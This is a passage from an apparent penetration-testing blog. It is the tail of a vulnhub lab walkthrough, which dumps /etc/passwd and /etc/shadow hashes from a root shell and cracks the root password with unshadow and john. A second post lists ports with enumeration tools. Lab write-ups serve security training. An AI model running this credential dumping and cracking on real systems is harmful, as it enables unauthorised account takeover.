shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
rpm:x:37:37::/var/lib/rpm:/sbin/nologin
apache:x:48:48:Apache:/var/www:/sbin/nologin
distcache:x:94:94:Distcache:/:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
nscd:x:28:28:NSCDDaemon:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
webalizer:x:67:67:Webalizer:/var/www/usage:/sbin/nologin
dovecot:x:97:97:dovecot:/usr/libexec/dovecot:/sbin/nologin
mysql:x:27:27:MySQLServer:/var/lib/mysql:/bin/bash
netdump:x:34:34:Network Crash Dump user:/var/crash:/bin/bash
pcap:x:77:77::/var/arpwatch:/sbin/nologin
avahi:x:70:70:Avahidaemon:/:/sbin/nologin
named:x:25:25:Named:/var/named:/sbin/nologin
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
rpc:x:32:32:PortmapperRPCuser:/:/sbin/nologin
xfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologin
gdm:x:42:42::/var/gdm:/sbin/nologin
rpcuser:x:29:29:RPCService User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
dstevens:x:500:506:Don Stevens:/home/dstevens:/bin/bash
achen:x:501:501:Andrew Chen:/home/achen:/bin/bash
pmoore:x:502:502:Phillip Moore:/home/pmoore:/bin/bash
jdurbin:x:503:503:James Durbin:/home/jdurbin:/bin/bash
sorzek:x:504:504:Sally Orzek:/home/sorzek:/bin/bash
ghighland:x:505:505:Greg Highland:/home/ghighland:/bin/bash
ossec:x:506:508::/var/ossec:/sbin/nologin
ossecm:x:507:508::/var/ossec:/sbin/nologin
ossecr:x:508:508::/var/ossec:/sbin/nologin


sh-3.1# cat /etc/shadow
root:$1$DSHH/MlC$DH8ClhHKeagYW4PwxICZC0:14309:0:99999:7:::
bin:*:14309:0:99999:7:::
daemon:*:14309:0:99999:7:::
adm:*:14309:0:99999:7:::
lp:*:14309:0:99999:7:::
sync:*:14309:0:99999:7:::
shutdown:*:14309:0:99999:7:::
halt:*:14309:0:99999:7:::
mail:*:14309:0:99999:7:::
news:*:14309:0:99999:7:::
uucp:*:14309:0:99999:7:::
operator:*:14309:0:99999:7:::
games:*:14309:0:99999:7:::
gopher:*:14309:0:99999:7:::
ftp:*:14309:0:99999:7:::
nobody:*:14309:0:99999:7:::
dbus:!!:14309:0:99999:7:::
rpm:!!:14309:0:99999:7:::
apache:!!:14309:0:99999:7:::
distcache:!!:14309:0:99999:7:::
ntp:!!:14309:0:99999:7:::
nscd:!!:14309:0:99999:7:::
vcsa:!!:14309:0:99999:7:::
webalizer:!!:14309:0:99999:7:::
dovecot:!!:14309:0:99999:7:::
mysql:!!:14309:0:99999:7:::
netdump:!!:14309:0:99999:7:::
pcap:!!:14309:0:99999:7:::
avahi:!!:14309:0:99999:7:::
named:!!:14309:0:99999:7:::
mailnull:!!:14309:0:99999:7:::
smmsp:!!:14309:0:99999:7:::
haldaemon:!!:14309:0:99999:7:::
rpc:!!:14309:0:99999:7:::
xfs:!!:14309:0:99999:7:::
gdm:!!:14309:0:99999:7:::
rpcuser:!!:14309:0:99999:7:::
nfsnobody:!!:14309:0:99999:7:::
sshd:!!:14309:0:99999:7:::
dstevens:$1$fU8HOHqa$N542xtl0ft8NmsYkv5NFo/:14309:0:99999:7:::
achen:$1$kxyn25Oz$w.MMADGQYIq4F52hi9DUQ.:14309:0:99999:7:::
pmoore:$1$p0RXlomV$m03UsjoTZ08qG8gbWHgST0:14309:0:99999:7:::
jdurbin:$1$CYmEyuc.$FXAeZHkhywwENbqE8h0O.0:14309:0:99999:7:::
sorzek:$1$cWeWNRdU$VTtlKsoRBmhMghnkSwqCQ.:14312:0:99999:7:::
ghighland:$1$ooKvtZEY$N2RpSaIylgFlHnBkbwUGz0:14309:0:99999:7:::
ossec:!!:14312:0:99999:7:::
ossecm:!!:14312:0:99999:7:::
ossecr:!!:14312:0:99999:7:::

NetstatOutput
sh-3.1# netstat-aActive Internet connections (servers and established)
ProtoRecv-Q Send-Q Local Address Foreign Address State
tcp 0 0 *:mysql *:* LISTEN
tcp 0 0 *:sunrpc *:* LISTEN
tcp 0 0 *:58194 *:* LISTEN
tcp 0 0 *:smtp *:* LISTEN
tcp 0 0 *:imaps *:* LISTEN
tcp 0 0 *:pop3s *:* LISTEN
tcp 0 0 *:pop3 *:* LISTEN
tcp 0 0 *:imap *:* LISTEN
tcp 0 0 *:http *:* LISTEN
tcp 0 0 *:ssh *:* LISTEN
tcp 0 0 *:https *:* LISTEN


sh-3.1# df-kl
Filesystem 1K-blocks Used Available Use% Mounted on
/dev/mapper/VolGroup00-LogVol00
2888460 1757260 982108 65% /
/dev/hda1 101086 9967 85900 11% /boot
tmpfs 1038136 0 1038136 0% /dev/shm

sh-3.1# mount
/dev/mapper/VolGroup00-LogVol00 on / type ext3 (rw)
procon /proctype proc(rw)
sysfson /sys type sysfs(rw)
devptson /dev/ptstype devpts(rw,gid=5,mode=620)
/dev/hda1 on /boot type ext3 (rw)
tmpfson /dev/shmtype tmpfs(rw)
none on /proc/sys/fs/binfmt_misc type binfmt_misc (rw)
sunrpcon /var/lib/nfs/rpc_pipefstype rpc_pipefs(rw)
automount(pid1528) on /net type autofs(rw,fd=4,pgrp=1528,minproto=2,maxproto=4)


Now as we have a privileged access to the system and access to the shadow and passwdfile, we can crack the root password :
root@kali:~/vulhub/ct4# unshadowpasswdshadow > unshadow.txt
root@kali:~/vulhub/ct4# greproot unshadow.txt> root.txt
root@kali:~/vulhub/ct4# cat root.txt
root:$1$DSHH/MlC$DH8ClhHKeagYW4PwxICZC0:0:0:root:/root:/bin/bash

root@kali:~/vulhub/ct4# john root.txt
Loaded 1 password hash (FreeBSDMD5 [128/128 SSE2 intrinsics 12x])
root1234 (root)
guesses: 1 time: 0:00:00:00 DONE (Tue Oct 27 19:59:06 2015) c/s: 4320 trying: Root888 - root7777
Use the "--show" option to display all of the cracked passwords reliably

root@kali:~/vulhub/ct4# john --show root.txt
root:root1234:0:0:root:/root:/bin/bash

1 password hash cracked, 0 left

Saturday, October 24, 2015

Common TCP/IP Ports For Penetration Testers

Some of the ports of interests for penetration testers are :

Port Number Usage ProtocolSome Enumeration Commands and Tools
21 FTP TCP Nmap NSE,
22 SSH TCP,UDP TBD
23 Telnet TCP TBD
25 SMTP TCP Nmap NSE
53 DNS TCP,UDP Nmap NSE, dnsrecon, nslookup
80 HTTP TCP,UDP Nmap NSE, nikto, dirbuster
123 NTP TCP TBD
135 Microsoft RPC TCP,UDP Nmap NSE, 
137 NetBIOS Name Service TCP,UDP Nmap NSE, 
139 NetBIOS Session Service,
Samba (SMB,CIFS)
TCP,UDP Nmap NSE, smbclient
161 SNMP TCP,UDP snmpwalk, onesixtyone
162 SNMP Trap TCP,UDP snmpwalk, onesixtyone
389 LDAP TCP,UDP TBD
443 HTTPS TCP,UDP Nmap NSE, nikto, dirbuster
445 Microsoft-ds TCP Nmap NSE, PsExec, nbtstat
3306 MySQL TCP Nmap NSE, sqlmap
3368 Global Catalogue TCP TBD
3389 RDP TCP TBD
List of Ports and usage


If you have any suggestions, please leave your comments below to add some here..

The Azure Synapse Resource Provider Error

  If you are get the error " The Azure Synapse resource provider (Microsoft.Synapse) needs to be registered with the selected subscript...